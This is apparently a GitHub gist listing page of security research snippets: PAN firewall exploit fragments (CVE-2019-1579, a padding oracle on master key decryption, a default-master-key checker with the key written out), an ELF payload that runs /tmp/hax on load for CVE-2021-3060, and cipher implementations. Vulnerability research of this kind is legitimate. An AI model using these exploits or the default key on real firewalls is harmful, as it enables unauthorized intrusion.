@rqu1
rqu1 / 8.0 hax
Last active August 4, 2022 12:22
CVE-2019-1579 fun times
#!/usr/bin/env python2
import urllib2
import struct
# Constants
ip_addr= '172.31.21.2'
# PA-VM
# 8.0
scep_offset=24
@rqu1
rqu1 / dst80.py
Created March 22, 2020 20:49
dst80 python implementation
def bit(x,n): return (x>>n)&1
def bit_slice(x,msb,lsb): return (x&((2<<msb)-1))>>lsb
def bv2i(*args):
    o=0
    for i in args: o=(o<<1)|i
    return o
def fa(x): return bit(0x3a35acc5,x)
@rqu1
rqu1 / aes.bf
Last active October 28, 2024 13:09
AES-128 in Brainfuck
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
@rqu1
rqu1 / checkmk.py
Last active August 4, 2024 16:42
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
@rqu1
rqu1 / pan-oracle.py
Last active February 15, 2024 19:00
0day padding oracle in PAN master key decryption
import paramiko
import sys
import requests
pad=lambda n: '\0'*(n+1)+(chr(16-n)*(16-n-1))
block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
set_pad=lambda x,n: block_xor(pad(n), x)
def formatData(d):
@rqu1
rqu1 / badlib.xx
Created September 25, 2022 06:43
.xx formatted dissection of a tiny ELF I made for cve-2021-3060
╔═══════════════════════════════════════════════════════════════╗
║ badlib.xx -- a tiny ELF shared object by rqu ║
║ This will exec() /tmp/hax when dlopen()'d or loaded ║
║ Originally released in binary form for my CVE-2021-3060 POC: ║
║ https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 ║
║ build the binary with https://github.com/netspooky/xx ║
╚═══════════════════════════════════════════════════════════════╝
┌───────────┬───────────────────┬───────────────┬──────────────┬─────────────┐
│ Data │ ELF header │ PHDR │ Code │ Dynamic │
├───────────┼───────────────────┼───────────────┼──────────────┼─────────────┤